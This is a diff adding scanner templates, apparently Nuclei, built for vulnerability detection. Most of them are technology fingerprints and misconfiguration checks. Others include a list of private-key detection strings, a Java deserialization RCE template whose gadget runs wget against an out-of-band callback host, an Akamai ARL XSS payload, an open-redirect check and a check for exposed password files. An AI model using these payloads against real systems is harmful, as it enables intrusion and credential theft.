           - "\"BEGIN DSA PRIVATE KEY\""
           - "\"BEGIN EC PRIVATE KEY\""
           - "\"BEGIN PGP PRIVATE KEY BLOCK\""
-          - "\"ssh-rsa\""
\ No newline at end of file
+          - "\"ssh-rsa\""
+          - "\"ssh-dsa\""
+          - "\"ssh-ed25519\""
diff --git a/iot/qvisdvr-deserialization-rce.yaml b/iot/qvisdvr-deserialization-rce.yaml
new file mode 100644
index 0000000000..0d82eb387e
--- /dev/null
+++ b/iot/qvisdvr-deserialization-rce.yaml
@@ -0,0 +1,42 @@
+id: qvisdvr-deserialization-rce
+
+info:
+  author: me9187
+  name: QVISDVR JSF Deserialization - Remote Code Execution
+  severity: critical
+  reference: https://twitter.com/Me9187/status/1414606876575162373
+  tags: qvisdvr,rce,deserialization,jsf,iot
+
+requests:
+  - raw:
+      - |
+        GET /qvisdvr/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
+
+    extractors:
+      - type: regex
+        name: token
+        group: 1
+        internal: true
+        part: header
+        regex:
+          - "JSESSIONID=(.*)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - http
\ No newline at end of file
diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml
new file mode 100644
index 0000000000..1acd46aec1
--- /dev/null
+++ b/misconfiguration/akamai-arl-xss.yaml
@@ -0,0 +1,31 @@
+id: akamai-arl-xss
+
+info:
+  name: Open Akamai ARL XSS
+  author: pdteam
+  severity: medium
+  tags: akamai,xss
+  reference: |
+      - https://github.com/war-and-code/akamai-arl-hack
+      - https://twitter.com/SpiderSec/status/1421176297548435459
+      - https://warandcode.com/post/akamai-arl-hack/
+      - https://github.com/cybercdh/goarl
+      - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        words:
+          - '"><svg onload=confirm(document.domain)>'
+          - 'Suggestions for improving the results'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
\ No newline at end of file
diff --git a/misconfiguration/android-debug-database-exposed.yaml b/misconfiguration/android-debug-database-exposed.yaml
new file mode 100644
index 0000000000..669be2723a
--- /dev/null
+++ b/misconfiguration/android-debug-database-exposed.yaml
@@ -0,0 +1,23 @@
+id: android-debug-database-exposed
+
+info:
+  name: Android Debug Manager
+  author: dhiyaneshDK
+  severity: low
+  reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22
+  tags: unauth,android
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Android Debug Database</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/viewpoint-system-status.yaml b/misconfiguration/viewpoint-system-status.yaml
new file mode 100644
index 0000000000..326fa9876c
--- /dev/null
+++ b/misconfiguration/viewpoint-system-status.yaml
@@ -0,0 +1,23 @@
+id: viewpoint-system-status
+
+info:
+  name: ViewPoint System Status
+  author: dhiyaneshDK
+  severity: low
+  reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22
+  tags: status,exposures
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>ViewPoint System Status</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml
new file mode 100644
index 0000000000..a1eee5e239
--- /dev/null
+++ b/misconfiguration/zabbix-dashboards-access.yaml
@@ -0,0 +1,26 @@
+id: zabbix-dashboards-access
+
+info:
+  name: zabbix-dashboards-access
+  author: pussycat0x
+  severity: medium
+  description: View dashboard with guest login.
+  reference: https://www.exploit-db.com/ghdb/5595
+  tags: zabbix,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Create dashboard"
+          - "Zabbix SIA"
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/technologies/bigbluebutton-detect.yaml b/technologies/bigbluebutton-detect.yaml
new file mode 100644
index 0000000000..bfe8188152
--- /dev/null
+++ b/technologies/bigbluebutton-detect.yaml
@@ -0,0 +1,24 @@
+id: bigbluebutton-detect
+
+info:
+  name: BigBlueButton Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,bigbluebutton
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>BigBlueButton</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/centreon-detect.yaml b/technologies/centreon-detect.yaml
new file mode 100644
index 0000000000..c3ca5df6a4
--- /dev/null
+++ b/technologies/centreon-detect.yaml
@@ -0,0 +1,24 @@
+id: centreon-detect
+
+info:
+  name: Centreon Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,centreon
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/centreon/index.php"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Centreon - IT & Network Monitoring</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/gespage-detect.yaml b/technologies/gespage-detect.yaml
new file mode 100644
index 0000000000..f64facbc02
--- /dev/null
+++ b/technologies/gespage-detect.yaml
@@ -0,0 +1,24 @@
+id: gespage-detect
+
+info:
+  name: Gespage Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,gespage
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/gespage/webapp/login.xhtml"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Login utilisateur Gespage</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml
new file mode 100644
index 0000000000..95ed07e8c1
--- /dev/null
+++ b/technologies/getsimple-cms-detector.yaml
@@ -0,0 +1,22 @@
+id: getsimple-cms-detector
+
+info:
+  name: GetSimple CMS Detector
+  author: philippedelteil
+  severity: info
+  description: With this template we can detect a running GetSimple CMS instance
+  tags: getsimple,tech
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/readme.txt"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'GetSimple CMS is a flatfile CMS'
+      - type: status
+        part: header
+        status:
+          - 200
diff --git a/technologies/itop-detect.yaml b/technologies/itop-detect.yaml
new file mode 100644
index 0000000000..daf68e81e2
--- /dev/null
+++ b/technologies/itop-detect.yaml
@@ -0,0 +1,24 @@
+id: itop-detect
+
+info:
+  name: iTop Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,itop
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pages/UI.php"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>iTop login</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/jeedom-detect.yaml b/technologies/jeedom-detect.yaml
new file mode 100644
index 0000000000..4154e6b7d0
--- /dev/null
+++ b/technologies/jeedom-detect.yaml
@@ -0,0 +1,24 @@
+id: jeedom-detect
+
+info:
+  name: Jeedom Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,jeedom
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?v=d"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Jeedom</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/jenkins-detect.yaml b/technologies/jenkins-detect.yaml
new file mode 100644
index 0000000000..4153223310
--- /dev/null
+++ b/technologies/jenkins-detect.yaml
@@ -0,0 +1,29 @@
+id: jenkins-detect
+
+info:
+  name: Jenkins detect (version)
+  author: philippdelteil
+  severity: info
+  tags: tech,jenkins
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "X-Jenkins"
+        part: header
+
+      - type: word
+        words:
+          - "<title>Sign in [Jenkins]</title>"
+        part: body
+
+    extractors:
+      - type: kval
+        part: header
+        kval:
+          - x_jenkins
diff --git a/technologies/openx-detect.yaml b/technologies/openx-detect.yaml
new file mode 100644
index 0000000000..1f43024105
--- /dev/null
+++ b/technologies/openx-detect.yaml
@@ -0,0 +1,29 @@
+id: openx-detect
+
+info:
+  name: OpenX detect
+  author: pikpikcu
+  severity: info
+  tags: tech,openx
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/www/admin/"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<title>OpenX</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'content="(.*)- http://www.openx.org">'
diff --git a/technologies/operations-automation-default-page.yaml b/technologies/operations-automation-default-page.yaml
new file mode 100644
index 0000000000..1a53b9bd61
--- /dev/null
+++ b/technologies/operations-automation-default-page.yaml
@@ -0,0 +1,23 @@
+id: operations-automation-default-page
+
+info:
+  name: Operations Automation Default Page
+  author: dhiyaneshDK
+  severity: info
+  reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+  tags: tech,default
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Operations Automation Default Page</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/phpcollab-detect.yaml b/technologies/phpcollab-detect.yaml
new file mode 100644
index 0000000000..6bfc4b094e
--- /dev/null
+++ b/technologies/phpcollab-detect.yaml
@@ -0,0 +1,25 @@
+id: phpcollab-detect
+
+info:
+  name: PhpCollab detect
+  author: pikpikcu
+  severity: info
+  tags: tech,phpcollab
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/general/login.php"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>PhpCollab</title>'
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<p id="footer">(.*)</p>'
diff --git a/technologies/wondercms-detect.yaml b/technologies/wondercms-detect.yaml
new file mode 100644
index 0000000000..9a84fa7999
--- /dev/null
+++ b/technologies/wondercms-detect.yaml
@@ -0,0 +1,25 @@
+id: wondercms-detect
+
+info:
+  name: WonderCMS Detect
+  author: pikpikcu
+  severity: info
+  tags: tech,wondercms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "Powered by WonderCMS"
+          - "https://www.wondercms.com"
+        condition: and
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
index 91d022d54e..8941ffc298 100644
--- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml
+++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
@@ -1,4 +1,4 @@
-id: jenkins-stack-traces
+id: jenkins-stack-trace
 
 info:
   name: Detect Jenkins in Debug Mode with Stack Traces Enabled
diff --git a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml b/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml
similarity index 100%
rename from vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
rename to vulnerabilities/jenkins/unaunthenticated-jenkin.yaml
diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml
new file mode 100644
index 0000000000..ebe3db78d6
--- /dev/null
+++ b/vulnerabilities/other/bitrix-open-redirect.yaml
@@ -0,0 +1,38 @@
+id: bitrix-open-redirect
+
+info:
+  name: Bitrix Open URL redirect detection
+  author: pikpikcu
+  severity: low
+  reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
+  tags: redirect,bitrix
+
+requests:
+  - method: GET
+
+    path:
+      - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
+      - '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
+      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+        part: header
+
+      - type: status
+        status:
+          - 302
+          - 301
+        condition: or
diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml
new file mode 100644
index 0000000000..8539ff6058
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@@ -0,0 +1,29 @@
+id: wordpress-upload-data
+
+info:
+  name: wordpress-upload-data
+  author: pussycat0x
+  severity: medium
+  description: Searches for Passwords  in the wordpress uploads directory.
+  reference: https://www.exploit-db.com/ghdb/7040
+  tags: wordpress,listing
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/uploads/data.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "admin:"
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200